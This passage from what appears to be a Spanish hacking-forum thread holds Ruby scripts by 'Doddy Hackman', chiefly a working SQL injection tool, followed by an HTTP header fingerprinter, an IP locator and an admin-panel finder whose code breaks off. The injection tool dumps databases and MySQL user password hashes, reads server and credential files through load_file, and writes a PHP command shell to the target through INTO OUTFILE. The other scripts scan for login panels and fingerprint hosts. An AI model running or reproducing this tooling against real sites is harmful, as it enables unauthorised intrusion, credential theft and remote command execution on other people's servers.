0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'] def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def decode_hex(text) text = text.sub("0x","") return [text].pack('H*')[0] end def encode_hex(text) return "0x"+text.unpack('H*')[0] end def copyright() print "\n-- == (C) Doddy Hackman 2015 == --\n" gets.chomp exit(1) end def installer() dir = Dir::pwd+"/"+"logs_webs" if not FileTest::directory?(dir) Dir::mkdir(dir) end end def savefile(file,text) url = URI.parse(file) save = File.open("logs_webs/"+url.host+".txt","a") save.puts text+"\n" save.close end def bypass(op) if op=="--" return "+","--" elsif op=="/*" return "/**/","/**/" elsif op=="%20" return "%20","%00" else return "+","--" end end def head() clean() print " @ @@ @ @@ @ @ @@ @ @@ @ @ @ @ @ @ @@@ @ @ @ @ @@ @ @@@ @ @ @@ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @@@ @@@@@ " end def volverinicio() print "\n\n[+] Press any key to continue\n\n" gets.chomp inicio() end def clean() if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/ system("cls") else system("clear") end end def retorno(url,by) print "\n[+] Finished" print "\n\n[+] Press any key to continue\n\n" gets.chomp central(url,by) end def gettables(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] Tables Found : #{total}\n") for num in ("17"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumns(url,by,tablex) tablexa = encode_hex(tablex) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] Table : #{tablex}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def getdbs(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))") print "\n[+] Getting DBS ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] DBS Found : ",total,"\n\n" savefile(url,"\n[+] DBS Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] DB Found : "+table+"\n" savefile(url,"[+] DB Found : #{table}") end end else print "[-] Not Found\n" end end def gettablesbydb(url,by,dbx) data = encode_hex(dbx) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))") print "\n[+] Getting tables ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Tables Found : ",total,"\n\n" savefile(url,"\n[+] DBS : #{dbx}") savefile(url,"[+] Tables Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Table Found : "+table+"\n" savefile(url,"[+] Table Found : #{table}") end end else print "[-] Not Found\n" end end def getcolumnsbydb(url,by,db,tab) data = encode_hex(db) tabx = encode_hex(tab) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))") print "\n[+] Getting columns ...\n\n" code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Columns Found : ",total,"\n\n" savefile(url,"\n[+] DB : #{db}") savefile(url,"[+] Table : #{tab}") savefile(url,"[+] Columns Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*?)K0BRA/ table = $1 print "[+] Column Found : "+table+"\n" savefile(url,"[+] Column Found : #{table}") end end else print "[-] Not Found\n" end end def mysqluser(url,by) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))") print "\n[+] Searching mysql.user\n\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 print "[+] Users Mysql Found : ",total,"\n\n" savefile(url,"[+] Users Mysql Found : "+total+"\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/ host,user,passw = $1,$2,$3 print "[Host] : "+host print " [User] : "+user print " [Pass] : "+passw+"\n" savefile(url,"[Host] : "+host) savefile(url,"[User] : "+user) savefile(url,"[Pass] : "+passw+"\n") end end else print "[-] Not Found\n" end end def details(url,by) pass1,pass2 = bypass(by) hextest = "0x2f6574632f706173737764" #/etc/passwd hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt web1 = url.sub(/hackman/,"0x4b30425241") web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))") print "\n[+] Extrating information of the DB\n" code1 = toma(web2) if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/ user,data,ver = $1,$2,$3 print "\n[+] Username : "+user print "\n[+] Database : "+data print "\n[+] Version : "+ver+"\n\n" savefile(url,"\n[+] Username : "+user) savefile(url,"[+] Database : "+data) savefile(url,"[+] Version : "+ver+"\n") else print "[-] Not Found\n" end code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) code4 = toma(web3) if code2=~/K0BRA/ print "[+] Mysql User : ON\n" savefile(url,"[+] Mysqluser : ON") end if code3=~/K0BRA/ print "[+] information_schema : ON\n" savefile(url,"[+] information_schema : ON") end if code4=~/ERTOR854/ print "[+] load_file : ON\n" savefile(url,"[+] load_file : ON") end savefile(url,"") #espacio en blanco end def dumper(url,by,table,col1,col2) pass1,pass2 = bypass(by) web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))") web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))") print "\n[+] Getting Values ...\n\n" code1 = toma(web1+pass1+"from"+pass1+table+pass2) if code1=~/K0BRA(.*?)K0BRA/ total = $1 savefile(url,"\n[+] Table : "+table) savefile(url,"[+] Column 1 : "+col1) savefile(url,"[+] Column 2 : "+col2) print "[+] Values Found : ",total,"\n" savefile(url,"\n[+] Values Found : #{total}\n") for num in ("0"..total) code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2) if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/ uno,dos = $1,$2 print "\n[+] "+col1+" : "+uno+"\n" print "[+] "+col2+" : "+dos+"\n" savefile(url,"\n[+] "+col1+" : "+uno) savefile(url,"[+] "+col2+" : "+dos) end end else print "[-] Not Found\n" end end def fuzzfile(url,by) pass1,pass2 = bypass(by) print "\n[+] Fuzzing Files with load_file ....\n" $files.each do |file| res = file file = file.chomp file = encode_hex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]") end end print "\n" end def abrirfile(url,by,file) pass1,pass2 = bypass(by) print "\n[+] Opening file ....\n" res = file file = encode_hex(file) web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))") code = toma(web1) if code=~/ERTOR854(.*?)ERTOR854/m print "\n\n[File Found] : ",res print "\n\n[Source Start]\n" print $1 print "\n[Source End]\n" savefile(url,"\n[File Found] : "+res) savefile(url,"\n[Source Start]\n") savefile(url,$1) savefile(url,"\n[Source End]\n") else print "\n\n[-] Error\n\n" end end def into(url,by,full,dir) pass1,pass2 = bypass(by) linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = full+"/cmd.php" lugardos = dir+"/cmd.php" h = URI.parse(url) webtest = "http://"+h.host+lugardos web1 = url.sub(/hackman/,linea) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if code=~/Mini Shell By Doddy/ print "\n[Shell Up] : "+webtest+"\n" savefile(url,"\n[Shell Up] : "+webtest+"\n") else print "\n\n[-] Error\n" end end def central(url,by) clean() head() print "\n\n[+] Page : #{url}\n" print "[+] ByPass : #{by}\n\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Fuzz Files with load_file\n" print "10 - Load files with load_file\n" print "11 - Create Shell\n" print "12 - Show log\n" print "13 - Change target\n" print "14 - Exit\n\n\n" print "[+] Option : " op = gets.chomp print "\n" if op == "1" gettables(url,by) retorno(url,by) elsif op == "2" print "\n[+] Table : " table = gets.chomp getcolumns(url,by,table) retorno(url,by) elsif op == "3" getdbs(url,by) retorno(url,by) elsif op == "4" print "\n[+] DB : " db = gets.chomp gettablesbydb(url,by,db) retorno(url,by) elsif op == "5" print "\n[+] DB : " db = gets.chomp print "\n[+] Table : " tab = gets.chomp getcolumnsbydb(url,by,db,tab) retorno(url,by) elsif op == "6" mysqluser(url,by) retorno(url,by) elsif op == "7" details(url,by) retorno(url,by) elsif op == "8" print "\n[+] Table : " table = gets.chomp print "\n[+] Column 1 : " col1 = gets.chomp print "\n[+] Column 2 : " col2 = gets.chomp dumper(url,by,table,col1,col2) retorno(url,by) elsif op == "9" fuzzfile(url,by) retorno(url,by) elsif op == "10" print "\n[+] File : " file = gets.chomp abrirfile(url,by,file) retorno(url,by) elsif op == "11" print "\n[Full Source Discloure] : " full = gets.chomp print "\n[Directory to test] : " dir = gets.chomp into(url,by,full,dir) retorno(url,by) elsif op == "12" urla = URI.parse(url) ar = "logs_webs/"+urla.host+".txt" system("start #{ar}") retorno(url,by) elsif op == "13" inicio() elsif op == "14" copyright() else retorno(url,by) end end def findlength(url,by) pass1,pass2 = bypass(by) z = "1" print "\n[+] Finding columns lenght ...\n\n" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data" z = z.sub($1,"hackman") sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z savefile(url,"[+] SQLI : "+sqli) savefile(url,"[+] Bypass : "+by+"\n") central(sqli,by) end end print "[-] Columns lenght not found\n" volverinicio() end def testvul(page,by) pass1,pass2 = bypass(by) print "\n\n[+] Testing vulnerability ...\n\n" codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2) if codeuno != codedos print "[+] Vulnerable !\n" findlength(page,by) else print "[-] Not vulnerable\n" print "\n[+] Scan anyway y/n : " op = gets.chomp if op == "y" findlength(page,by) else volverinicio() end end end def inicio() clean() head() print "\n\n[+] Page : " page = gets.chomp print "\n[+] Bypass : " by = gets.chomp if page=~/hackman/ central(page,by) else testvul(page,by) end end installer() inicio() # The End ?
Eso es todo.
|
|
|
55
|
Programación / Scripting / [Ruby] HTTP FingerPrinting 0.2
|
en: 12 Julio 2015, 17:27 pm
|
Un simple script en Ruby para hacer HTTP FingerPrinting. Version consola : #!usr/bin/ruby #HTTP FingerPrinting 0.2 #(C) Doddy Hackman 2015 require "net/http" # Functions def httpfinger(page) respuesta = "" begin nave = Net::HTTP.start(page) headers = nave.head("/") headers.each do |name,value| respuesta = respuesta + "[+] "+name+" : "+value+"\n" end nave.finish rescue respuesta = "Error" end return respuesta end def uso print "\n[+] Sintax : ruby httpfinger.rb <target>\n" end def head print "\n-- == HTTP FingerPrinting 0.2 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end # target = ARGV[0] head() if !target uso() else print "\n[+] Searching ...\n\n" print httpfinger(target) print "\n[+] Finished\n" end copyright() #The End ?
Version Tk : #!usr/bin/ruby #HTTP FingerPrinting 0.2 #(C) Doddy Hackman 2015 require "tk" require "net/http" # Functions def httpfinger(page) respuesta = "" begin nave = Net::HTTP.start(page) headers = nave.head("/") headers.each do |name,value| respuesta = respuesta + "[+] "+name+" : "+value+"\n" end nave.finish rescue respuesta = "Error" end return respuesta end # window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" } window['geometry'] = '300x300-20+10' TkLabel.new(window) do background "black" foreground "cyan" text " Target : " place('relx'=>"0.1",'rely'=>"0.1") end target = TkEntry.new(window){ background "black" foreground "cyan" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "cyan" text "Console" place('relx'=>0.4,'rely'=>0.2) end console =TkText.new(window) do background "black" foreground "cyan" width 30 height 10 place('relx'=>0.1,'rely'=>0.3) end TkButton.new(window) do text "Search" background "black" foreground "cyan" width 17 activebackground "cyan" highlightbackground "cyan" command proc{ target = target.value.to_s console.insert("end","[+] Searching ...\n\n") console.insert("end",httpfinger(target)) console.insert("end","\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
56
|
Programación / Scripting / [Ruby] LocateIP 0.3
|
en: 27 Junio 2015, 01:18 am
|
Un simple script en Ruby para localizar una IP y sus DNS. Version consola : #!usr/bin/ruby #LocateIP 0.3 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" require "resolv" # Functions def get_ip(hostname) begin return Resolv.getaddress(hostname) rescue return "Error" end end def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def uso print "\n[+] Sintax : ruby locateip.rb <target>\n" end def head print "\n\n-- == LocateIP 0.3 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end def locateip(target) print "\n[+] Getting IP ...\n" ip = get_ip(target) print "\n[+] IP : "+ip+"\n" web = "http://www.melissadata.com/lookups/iplocation.asp" print "\n[+] Locating ...\n\n" code = tomar(web,"ipaddress="+ip+"&btn=Submit") if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] City : "+$2+"\n" else print "[+] City : Not Found\n" end if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] Country : "+$2+"\n" else print "[+] Country : Not Found\n" end if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ print "[+] State or Region : "+$2+"\n"; else print "[+] State of Region : Not Found\n" end print "\n[+] Getting DNS ...\n\n" control = "0" code = toma("http://www.ip-adress.com/reverse_ip/"+ip) dnss = code.scan(/whois\/(.*?)\">Whois/) dnss.flatten.each do |dns| begin if dns != "" control = "1" print "[+] DNS Found : "+dns end end end if control=="0" print "\n[-] DNS Not Found\n" end end target = ARGV[0] head() if !target uso() else locateip(target) end copyright() #The End ?
Version Tk : #!usr/bin/ruby #LocateIP 0.3 #(C) Doddy Hackman 2015 require "tk" require "open-uri" require "net/http" require "resolv" # Functions def get_ip(hostname) begin return Resolv.getaddress(hostname) rescue return "Error" end end def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end # window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" } window['geometry'] = '300x300-20+10' TkLabel.new(window) do background "black" foreground "yellow" text " Target : " place('relx'=>"0.1",'rely'=>"0.1") end target = TkEntry.new(window){ background "black" foreground "yellow" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "yellow" text "Console" place('relx'=>0.4,'rely'=>0.2) end console =TkText.new(window) do background "black" foreground "yellow" width 30 height 10 place('relx'=>0.1,'rely'=>0.3) end TkButton.new(window) do text "Search" background "black" foreground "yellow" width 17 activebackground "yellow" highlightbackground "yellow" command proc{ target = target.value.to_s console.insert("end", "[+] Getting IP ...\n") ip = get_ip(target) web = "http://www.melissadata.com/lookups/iplocation.asp" console.insert("end", "\n[+] Locating ...\n\n") code = tomar(web,"ipaddress="+ip+"&btn=Submit") if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ console.insert("end", "[+] City : "+$2+"\n") else console.insert("end", "[+] City : Not Found\n") end if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ console.insert("end","[+] Country : "+$2+"\n") else console.insert("end", "[+] Country : Not Found\n") end if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ console.insert("end", "[+] State or Region : "+$2+"\n") else console.insert("end","[+] State of Region : Not Found\n") end console.insert("end","\n[+] Getting DNS ...\n\n") control = "0" code = toma("http://www.ip-adress.com/reverse_ip/"+ip) dnss = code.scan(/whois\/(.*?)\">Whois/) dnss.flatten.each do |dns| begin if dns != "" control = "1" console.insert("end", "[+] DNS Found : "+dns) end end end if control=="0" console.insert("end","\n[-] DNS Not Found\n") end console.insert("end","\n\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
57
|
Programación / Scripting / [Ruby] PanelFinder 0.5
|
en: 12 Junio 2015, 23:52 pm
|
Un simple script en Ruby para buscar el panel de administracion de una pagina. Version consola : #!usr/bin/ruby #PanelFinder 0.5 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def find_panel(page) panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] print "\n[+] Scanning ...\n\n" control = "0" panels.each do |panel| begin url = page+"/"+panel status_code = response_code(url) if status_code=="200" print "[+] Link : "+url+"\n" control = "1" end end end if control=="1" print "\n[+] Finished\n" else print "\n[-] Not Found\n" end end def uso print "\n[+] Sintax : ruby panel_finder.rb <page>\n" end def head print "\n\n-- == Panel Finder 0.5 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end page = ARGV[0] head() if !page uso() else find_panel(page) end copyright() #The End ?
Version Tk : #!usr/bin/ruby #PanelFinder 0.5 #(C) Doddy Hackman 2015 require "tk" require "open-uri" require "net/http" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end # window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" } window['geometry'] = '300x300-20+10' TkLabel.new(window) do background "black" foreground "orange" text " Page : " place('relx'=>"0.1",'rely'=>"0.1") end page = TkEntry.new(window){ background "black" foreground "orange" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "orange" text "Console" place('relx'=>0.4,'rely'=>0.2) end console =TkText.new(window) do background "black" foreground "orange" width 30 height 10 place('relx'=>0.1,'rely'=>0.3) end TkButton.new(window) do text "Search" background "black" foreground "orange" width 17 activebackground "orange" highlightbackground "orange" command proc{ page = page.value.to_s panels = 